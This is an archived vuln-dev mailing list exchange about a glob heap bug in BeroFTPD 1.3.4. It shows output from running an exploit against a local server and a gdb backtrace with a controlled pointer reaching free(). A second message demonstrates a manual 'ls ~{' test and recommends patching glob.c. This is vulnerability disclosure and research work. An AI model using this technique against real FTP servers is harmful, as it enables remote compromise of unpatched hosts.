re: Older BeroFTPD glob

From: KF (dotslash@snosoft.com)
Date: 01/02/70


Date: Thu, 01 Jan 1970 18:09:19 -0500
From: KF <dotslash@snosoft.com>
To: eduardo.cruz@tsg.com, vuln-dev@security-focus.com

In Eduardo's reply I did not find it clear that BeroFTPD 1.3.4 was or was
not vuln by default compile. I compiled it from the latest source on
the wu-ftpd.org ftp server. Bare, with no patches, I get the following
result... which was the same with earlier versions. Again, I am on a ppc
linux box:

[root@ibook root]# java wuwarez 42424242 0 localhost anonymous
Shellcode is 44 bytes long
return is 42424242
Got Socket
Sleeping so that you can attach a debugger
220 ibook FTP server (BeroFTPD 1.3.4(2) Mon Dec 1 23:09:32 EST 2003) ready.
Sending username
331 Guest login ok, send your complete e-mail address as password.
sending mal buffer as the passwd
;230 Guest login ok, access restrictions apply.
Populate Heap...needs more work
(program exit)
[root@ibook root]#

(This is what we saw when we attached the debugger)

[root@ibook src]# ps -ef | grep ftpd
ftp 2035 790 0 14:55 ? 00:00:00 ftpd: localhost.localdomain: anonymous
[root@ibook src]# gdb ./ftpd 2035
Program received signal SIGSEGV, Segmentation fault.
0xfeb6cfc in free () from /lib/libc.so.6
(gdb) bt
#0 0xfeb6cfc in free () from /lib/libc.so.6
#1 0x10010b58 in blkfree (av0=0x42424242) at glob.c:604
#2 0x1000dd04 in yyparse () at ftpcmd.y:1246
#3 0x10002cac in main (argc=268566528, argv=0x7ffffc74,
envp=0x1003e828) at ftpd.c:1221
#4 0xfe5e308 in __libc_start_main () from /lib/libc.so.6

Detaching from program: /root/BeroFTPD-1.3.4/src/./ftpd, Pid 2035

-KF

From: "Eduardo Cruz" <eduardo.cruz@tsg.com>
Date: Sun Dec 09, 2001 05:00:10 AM US/Pacific
To: "KF" <dotslash@snosoft.com>, <vuln-dev@security-focus.com>
Subject: Re: Older BeroFTPD glob

Connected to localhost.
220 cimitarra FTP server (BeroFTPD 1.3.4(1) Wed May 30 18:22:32 CEST 2001) ready.
Name (localhost:root): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Welcome, archive user! This is an experimental FTP server. If have any
230-unusual problems, please report them via e-mail to root@cimitarra
230-If you do have problems, please try using a dash (-) as the first character
230-of your password -- this will turn off the continuation messages that may
230-be confusing your ftp client.
230-
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ~{
200 PORT command successful.
550 Missing }
ftp>

Just patch glob.c yourself, or use mine, already patched (attached).
And about the maintenance of beroftp, as far as I know it has not been done
for years.
Anyway, apart from the bugs deriving from wuftpd I don't see the point in
maintaining bero; I find it quite perfect like it is.

have fun


